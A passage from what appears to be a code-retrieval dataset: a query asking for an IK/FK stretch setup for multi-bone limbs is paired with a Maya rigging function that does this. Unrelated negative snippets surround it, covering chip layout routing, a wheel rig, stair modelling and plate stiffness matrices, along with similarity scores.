items successfully packed into boxes!')\n else:\n print('Unable to pack all items!')\n for box in box_list:\n print('Box',box.id,'of weight capacity',box.max_cap,'contains:')\n for item in box.items_list:\n print(item.name,'of weight',item.weight)\n for item in SortedItems:\n if item not in lemon:\n print(item.name,'of weight',item.weight,'got left behind')\n print('\\n')", "def route_gnd(self):\n \n gnd_start = self.rbl_inv_inst.get_pin(\"gnd\").bc()\n gnd_end = vector(gnd_start.x, self.rbl_inst.uy()+2*self.m2_pitch)\n \n # Add a rail in M1 from bottom of delay chain to two above the RBL\n # This prevents DRC errors with vias for the WL\n dc_top = self.dc_inst.ur()\n self.add_segment_center(layer=\"metal1\",\n start=vector(gnd_start.x, dc_top.y),\n end=gnd_end)\n\n # Add a rail in M2 from RBL inverter to two above the RBL\n self.add_segment_center(layer=\"metal2\",\n start=gnd_start,\n end=gnd_end)\n \n # Add pin from bottom to RBL inverter\n self.add_layout_pin_center_segment(text=\"gnd\",\n layer=\"metal1\",\n start=gnd_start.scale(1,0),\n end=gnd_start)\n \n # Connect the WL pins directly to 
gnd\n gnd_pin = self.get_pin(\"gnd\").rc()\n for row in range(self.bitcell_loads):\n wl = \"wl[{}]\".format(row)\n pin = self.rbl_inst.get_pin(wl)\n start = vector(gnd_pin.x,pin.cy())\n self.add_segment_center(layer=\"metal1\",\n start=start,\n end=pin.lc())\n self.add_via_center(layers=(\"metal1\", \"via1\", \"metal2\"),\n offset=start)\n\n # Add via for the delay chain\n offset = self.dc_inst.get_pins(\"gnd\")[0].bc() + vector(0.5*contact.m1m2.width,0.5*contact.m1m2.height)\n self.add_via_center(layers=(\"metal1\", \"via1\", \"metal2\"),\n offset=offset)\n\n # Add via for the inverter\n offset = self.rbl_inv_inst.get_pin(\"gnd\").bc() - vector(0,0.5*contact.m1m2.height)\n self.add_via_center(layers=(\"metal1\", \"via1\", \"metal2\"),\n offset=offset)\n\n # Connect the bitcell gnd pins to the rail\n gnd_pins = self.get_pins(\"gnd\")\n gnd_start = gnd_pins[0].ul()\n rbl_gnd_pins = self.rbl_inst.get_pins(\"gnd\")\n # Add L shapes to each vertical gnd rail\n for pin in rbl_gnd_pins:\n if pin.layer != \"metal2\":\n continue\n gnd_end = pin.uc()\n gnd_mid = vector(gnd_end.x, gnd_start.y)\n self.add_wire((\"metal1\",\"via1\",\"metal2\"), [gnd_start, gnd_mid, gnd_end])\n gnd_start = gnd_mid\n \n\n # Add a second gnd pin to the second delay chain rail. No need for full length.\n dc_gnd_offset = self.dc_inst.get_pins(\"gnd\")[1].ll()\n self.add_layout_pin(text=\"gnd\",\n layer=\"metal1\",\n offset=dc_gnd_offset.scale(1,0),\n width=self.m1_width,\n height=self.delay_chain_offset.y)", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n mc.setAttr(self.guide_master+'.offsetTranslateY', -0.2)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n mirror_values = [1, -1]\n enable_steering = options.get('enableSteering')\n\n colors = ['green', 'red']\n\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n color = colors[mi]\n\n l_main_zero, l_main_plc = self.guide_joint('main', alt_prefix=prefix, placer_only=1)\n\n # create hub\n hub_zero, hub_plc, hub_jnt = self.guide_joint('wheelhub', alt_prefix=prefix, constraint_type='point')\n hub_end_zero, hub_end_plc, hub_end_jnt = self.guide_joint('wheelhub_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(hub_end_zero, r=1, t=[1,0,0])\n mc.parent(hub_end_jnt, hub_jnt)\n mc.aimConstraint(hub_end_plc, hub_jnt, aim=[mirror_value,0,0], u=[0,1,0], wu=[0,1,0], wut='vector')\n mc.parentConstraint(hub_plc, hub_end_zero , mo=1)\n\n # Create steering arm\n steer_zero, steer_plc, steer_jnt = self.guide_joint('steeringArm', alt_prefix=prefix, constraint_type='parent')\n mc.xform(steer_zero, r=1, t=[-1,0,0])\n mc.parent(hub_jnt, steer_jnt)\n\n # Create shocks\n shock_a_zero, shock_a_plc, shock_a_jnt = self.guide_joint('shock_A', alt_prefix=prefix, constraint_type='point')\n shock_b_zero, shock_b_plc, shock_b_jnt = self.guide_joint('shock_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(shock_a_zero, ws=1, t=[-2,2,0])\n mc.xform(shock_b_zero, ws=1, t=[-0.5,0.25,0])\n\n mc.parent(shock_b_jnt, shock_a_jnt)\n\n mc.aimConstraint(shock_b_plc, shock_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n mc.aimConstraint(shock_a_plc, 
shock_b_jnt, aim=[-mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # upper arm\n up_arm_zero, up_arm_plc, up_arm_jnt = self.guide_joint('upperArm', alt_prefix=prefix, constraint_type='point')\n up_arm_end_zero, up_arm_end_plc, up_arm_end_jnt = self.guide_joint('upperArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(up_arm_end_zero, r=1, t=[-3.5,1,0])\n mc.xform(up_arm_zero, r=1, t=[-1,0.5,0])\n mc.parent(up_arm_end_jnt, up_arm_jnt)\n mc.aimConstraint(up_arm_end_plc, up_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=up_arm_plc)\n\n # lower arm\n lo_arm_zero, lo_arm_plc, lo_arm_jnt = self.guide_joint('lowerArm', alt_prefix=prefix, constraint_type='point')\n lo_arm_end_zero, lo_arm_end_plc, lo_arm_end_jnt = self.guide_joint('lowerArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(lo_arm_end_zero, r=1, t=[-4,-0.5,0])\n mc.xform(lo_arm_zero, r=1, t=[-1,-0.5,0])\n mc.parent(lo_arm_end_jnt, lo_arm_jnt)\n mc.aimConstraint(lo_arm_end_plc, lo_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=lo_arm_plc)\n\n # steeringArm\n if enable_steering:\n steeringArm_a_zero, steeringArm_a_plc, steeringArm_a_jnt = self.guide_joint('steeringArm_A', alt_prefix=prefix, constraint_type='point')\n steeringArm_b_zero, steeringArm_b_plc, steeringArm_b_jnt = self.guide_joint('steeringArm_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(steeringArm_b_zero, r=1, t=[-1.5,0,1])\n mc.xform(steeringArm_a_zero, r=1, t=[-4,0,1])\n\n mc.parent(steeringArm_b_jnt, steeringArm_a_jnt)\n mc.aimConstraint(steeringArm_b_plc, steeringArm_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # Create control\n zero, ctrl = self.guide_ctrl('wheel', alt_prefix=prefix, driver=hub_end_jnt, color=color, shape='circle', axis='X', scale=[3]*3, create_pivot=0)\n mc.setAttr(ctrl+'.numOffsetCtrls', 1)\n mc.addAttr(ctrl+'.numOffsetCtrls', e=1, min=1)\n mc.xform(ctrl.replace('_CTL','_A_OFF_CTL.cv[*]'), r=1, s=[0.8]*3)\n\n control.create_shape('wheel', ctrl, axis='X', scale=[3]*3)\n\n #suspension_zero, suspension_ctrl = self.guide_ctrl('suspension', create_pivot=0, driver=shock_a_jnt, axis='X', shape='pyramid', color=color, scale=[1.5,1,1], alt_prefix=prefix)\n ground_zero, ground_ctrl = self.guide_ctrl('ground', create_pivot=0, shape='square', color='grass', alt_prefix=prefix)\n mc.delete(mc.pointConstraint(hub_jnt, ground_zero))\n\n # constraint to placer\n childs = [prefix+'_wheelhub_JNT_PLC_ZERO',\n prefix+'_steeringArm_JNT_PLC_ZERO',\n prefix+'_shock_A_JNT_PLC_ZERO',\n prefix+'_shock_B_JNT_PLC_ZERO',\n prefix+'_upperArm_JNT_PLC_ZERO',\n prefix+'_upperArm_end_JNT_PLC_ZERO',\n prefix+'_lowerArm_JNT_PLC_ZERO',\n prefix+'_lowerArm_end_JNT_PLC_ZERO']\n\n for c in childs:\n mc.parentConstraint(l_main_plc, c, mo=1)\n\n mc.setAttr(l_main_plc+'.offsetTranslateY', mirror_value*0.5)\n\n # ################3\n # Place it all\n hub_pos = mc.ls(options.get('hubCenter') or '')\n if hub_pos:\n loc = utils.snap_locator(hub_pos)\n mc.delete(mc.pointConstraint(loc, self.guide_master))\n mc.setAttr(self.guide_master+'.tx', 0)\n mc.delete(mc.pointConstraint(loc, l_main_plc), loc)\n\n hub_end_pos = mc.ls(options.get('hubEndCenter') or '')\n if hub_end_pos:\n loc = utils.snap_locator(hub_end_pos)\n mc.delete(mc.pointConstraint(loc, hub_end_plc), loc)\n\n else:\n mc.xform(self.guide_master, ws=1, t=[0,2,10])\n mc.xform(l_main_plc, r=1, t=[mirror_value*6,0,0])\n\n mc.setAttr(self.guide_master+'.jointAxisVis', 
1)\n\n l = utils.snap_locator(hub_jnt)\n mc.setAttr(l+'.ty', 0)\n mc.delete(mc.pointConstraint(l, ground_zero), l)\n\n chassis_plc_zero, chassis_plc = self.guide_joint('chassis_driver', placer_only=1)\n mc.setAttr(chassis_plc+'.radius', 1)\n mc.setAttr(chassis_plc+'.color', 0.96, 0.71, .01)\n mc.setAttr(chassis_plc+'.otherType', 'Leg IK Driver', type='string');\n mc.setAttr(chassis_plc+'.type', 18)\n\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT_PLC', r_prefix+'_lowerArm_end_JNT_PLC', chassis_plc_zero)\n utils.set_attrs(chassis_plc, l=1, k=0)\n\n # This finalizes your guide.\n self.finalize_guide()\n self.mirror_guide()", "def make_stair(nstep,treadDept,riserHeight,landingLength,stepWidth,n):\n\tstep = MKPOL([[[0,0],[0,riserHeight],[2*treadDept,riserHeight], [treadDept,0]],[[1,2,3,4]],1])\n\tstep1 = MKPOL([[[0,0],[0,riserHeight],[treadDept,2*riserHeight], [treadDept,riserHeight]],[[1,2,3,4]],1])\n\tstep = PROD([QUOTE([stepWidth]),step])\n\tstep = TEXTURE(\"texture/Liptus.jpg\")(step)\n\thandrailTop = PROD([QUOTE([stepWidth/15.0]),step1])\n\thandrail = CIRCLE(stepWidth/30.0)([20,20])\n\n\thandrail = PROD([QUOTE([1]),handrail])\n\n\thandrail = R([1,3])(PI/2)(handrail)\n\thandrail = T([1,2,3])([stepWidth-(stepWidth/30.0),treadDept/2,riserHeight])(handrail)\n\thandrail = COLOR(BLACK)(handrail)\n\tstep = STRUCT([step,handrail])\n\thandrailTop = R([2,3])(PI)(handrailTop)\n\thandrailTop = T([1,2,3])([stepWidth-(stepWidth/15.0),treadDept,1+2*riserHeight])(handrailTop)\n\thandrailTop = TEXTURE(\"texture/Liptus.jpg\")(handrailTop)\n\tstep = STRUCT([step,handrailTop])\n\tstair = [step]\n\tif n == 0:\n\t\tstair = []\n\t\"\"\" realization total step \"\"\"\n\tfor i in range(nstep):\n\t\tstep = T([2,3])([treadDept,riserHeight])(step)\n\t\tstair.append(step)\n\tfinalStep = T([2,3])([(treadDept*(nstep+1)),(riserHeight*(nstep))])(CUBOID([stepWidth,landingLength,riserHeight]))\n\tfinalStep = TEXTURE(\"texture/Liptus.jpg\")(finalStep)\n\tstair.append(finalStep)\n\treturn STRUCT(stair)" ]
[ "0.6122613", "0.60881704", "0.5706191", "0.5586057", "0.554519", "0.55225635", "0.55225635", "0.54242057", "0.54017335", "0.5394755", "0.5353252", "0.52999943", "0.52834505", "0.52750146", "0.524787", "0.5220676", "0.5217967", "0.51952493", "0.51629597", "0.5109538", "0.5100428", "0.5094992", "0.5077157", "0.50667536", "0.5065042", "0.50447977", "0.50394416", "0.50359344", "0.50189936", "0.5017399", "0.50134295", "0.50124794", "0.49903733", "0.49891877", "0.4978869", "0.4975615", "0.4960682", "0.49603075", "0.49596918", "0.495891", "0.49561992", "0.49484596", "0.49445355", "0.49401549", "0.49300483", "0.49278226", "0.4915566", "0.49132022", "0.48980662", "0.48945427", "0.48929912", "0.48920074", "0.48873815", "0.48869705", "0.48858416", "0.48726046", "0.48672038", "0.48610786", "0.48603994", "0.48525825", "0.4847859", "0.48275584", "0.48267615", "0.48229527", "0.4818337", "0.48158106", "0.48152143", "0.48034924", "0.48030218", "0.4802689", "0.4802371", "0.4797963", "0.4797196", "0.47926602", "0.47855768", "0.4785363", "0.47851047", "0.47846082", "0.47804984", "0.4764962", "0.47552463", "0.47448727", "0.4742041", "0.4740054", "0.47389486", "0.47388452", "0.47376028", "0.47365215", "0.47332388", "0.47319803", "0.47195834", "0.4718834", "0.47161838", "0.4715655", "0.47131845", "0.47097987", "0.47094414", "0.47077584", "0.47060627", "0.47011113" ]
0.66334
0
Create IK FK Stretch for limbs with more than two bones
def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle): root_grp = utils.get_parent(jnts[0]) stretch_jnts = jnts[1:] stretch_fk_ctrls = fk_ctrls[1:] # create attrs attrs = ['upStretch','loStretch'] for i in reversed(range(len(stretch_jnts)-2)): ltr = '' if i > 0: ltr = utils.letters[i] attrs.insert(1, 'midStretch'+ltr) if not mc.objExists(ik_ctrl+'.autoStretch'): mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1) for i in range(len(stretch_jnts)): if not mc.objExists(ik_ctrl+'.'+attrs[i]): mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1) for fk_ctrl in fk_ctrls[:-1]: if not mc.objExists(fk_ctrl+'.stretch'): mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1) # store initial length of joint init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts] abs_init_lengths = [abs(v) for v in init_lengths] total_init_length = 0 for v in init_lengths: total_init_length += v abs_total_init_length = abs(total_init_length) # Create dist reader root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node) auto_stretch_clamp = mc.createNode('clamp') mc.setAttr(auto_stretch_clamp+'.minR', 1) mc.setAttr(auto_stretch_clamp+'.maxR', 10000000) mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR') mc.addAttr(ik_ctrl, ln='stretchFactor', k=0) mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor') pma = mc.createNode('plusMinusAverage') utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength') # handle soft ik handle constraint override pc = mc.pointConstraint(ik_last_node, ik_handle)[0] if mc.objExists(jnts[0]+'.softIkChainLength'): # compensate chain length - feed in new chain length for soft ik chain length utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength') # blend off the soft ik constraint IF im in auto stretch mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1') utils.connect_reverse(pc+'.w1', pc+'.w0') # easy stuff first - create fk stretch nodes fk_to_ik_blends = [] # This is the final output for IK stretch for i, jnt in enumerate(stretch_jnts): # easy stuff first - create fk stretch nodes fk_mdl = mc.createNode('multDoubleLinear') mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx')) mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2') utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx') # Create user secifed IK stretch user_ik_scale_mdl = mc.createNode('multDoubleLinear') mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i]) mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2') # Now create the IK auto stretch nodes auto_stretch_mdl = mc.createNode('multDoubleLinear') mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1) mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1) mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i)) fk_to_ik_blend = mc.createNode('blendTwoAttr') auto_stretch_blend = mc.createNode('blendTwoAttr') mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender') mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]') mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]') mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender') mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]') mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]') fk_to_ik_blends.append(fk_to_ik_blend+'.output') for i, jnt in enumerate(stretch_jnts): 
mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def boundary(self):\n answer = self.zero()\n for k, v in self.items():\n for idx, cube in enumerate(k):\n acc_dim = sum((cube_l.dimension for cube_l in k[:idx]))\n for i in range(cube.dimension):\n for epsilon in (0, 1):\n new_cube = cube.face(i, epsilon)\n new_k = k[:idx] + (new_cube,) + k[idx + 1:]\n sign_exp = (acc_dim + i + epsilon) % 2\n answer += answer.create({new_k: v * (-1)**sign_exp})\n return answer", "def find_new_kbl(self):\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w']\n z_u_r = self.grid_dict['z_u_r']\n\n #---> j loop\n for j in range(Ly):\n self.kbl[j] = N #initialize search at top\n\n # in fortran k=N-1,1,-1\n for k in range(N-1,0,-1):\n #INDEX MAP\n k_w = k\n k_r = k-1\n \n for j in range(Ly):\n if z_u_w[j,k_w] > z_u_w[j,N] - self.hbls[j]:\n self.kbl[j] = k_w", "def build_block_cross(self):\n from ambry.geo.util import find_geo_containment, find_containment\n from geoid import civick \n\n lr = self.init_log_rate(3000)\n\n def gen_bound():\n \n boundaries = self.library.dep('blockgroups').partition\n\n # Note, ogc_fid is the primary key. The id column is created by the shapefile. \n for i,boundary in enumerate(boundaries.query(\n \"SELECT AsText(geometry) AS wkt, gvid FROM blockgroups\")):\n lr('Load rtree')\n \n yield i, boundary['wkt'] , boundary['gvid'] \n \n def gen_points():\n\n for row in self.partitions.find(table = 'facilities_addresses').rows:\n if row['longitude'] and row['latitude']:\n yield (row['longitude'], row['latitude']), row['facilities_id']\n\n\n p = self.partitions.find_or_new(table='facilities_geoids')\n p.clean()\n\n with p.inserter() as ins:\n for point, point_o, cntr_geo, cntr_o in find_containment(gen_bound(),gen_points()):\n\n blockgroup_gvid = civick.Blockgroup.parse(cntr_o)\n tract_gvid = blockgroup_gvid.convert(civick.Tract)\n county_gvid = blockgroup_gvid.convert(civick.County)\n \n ins.insert(dict(facilities_id = point_o, \n blockgroup_gvid = str(blockgroup_gvid),\n tract_gvid = str(tract_gvid),\n county_gvid = str(county_gvid)\n ))\n \n lr('Marking point containment')", "def k_b(self):\n\n b = self.width()/2\n c = self.height()/2\n\n Ex = self.E\n Ey = self.E\n nu_xy = self.nu\n nu_yx = self.nu\n G = self.E/(2*(1 + self.nu))\n t = self.t\n\n # Stiffness matrix for plate bending. This matrix was derived using a jupyter notebook. 
The\n # notebook can be found in the `Derivations`` folder of this project.\n k = t**3/12*array([[(-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2 + Ey*nu_xy*b**2/2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), (-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2/2 - Ey*nu_xy*b**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(-Ey*nu_xy*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), Ey*nu_xy/(nu_xy*nu_yx - 1), (Ey*nu_xy*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0],\n [(Ex*nu_yx*b**2/2 + Ex*c**2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*nu_xy*nu_yx*b**2 - 2*G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), (-5*Ex*c**2 + G*nu_xy*nu_yx*b**2 - G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), 0, 2*(-5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2/2 + Ex*c**2/2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))],\n [(5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ex*c**2 + G*nu_xy*nu_yx*b**2 - G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2 - Ey*nu_xy*b**2/2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 
(-Ex*c**2/2 + Ey*nu_xy*b**2/2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(Ey*nu_xy*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-Ey*nu_xy*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), -Ey*nu_xy/(nu_xy*nu_yx - 1), (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0],\n [(5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), 0, 2*(-5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2/2 - Ex*c**2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), -Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*nu_xy*nu_yx*b**2 - 2*G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*nu_yx*b**2/2 - Ex*c**2/2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))],\n [(-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (-5*Ex*c**2 - 25*Ey*nu_xy*b**2 + 2*b**2*(15*Ey*nu_xy - G*nu_xy*nu_yx + G))/(10*b**2*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - 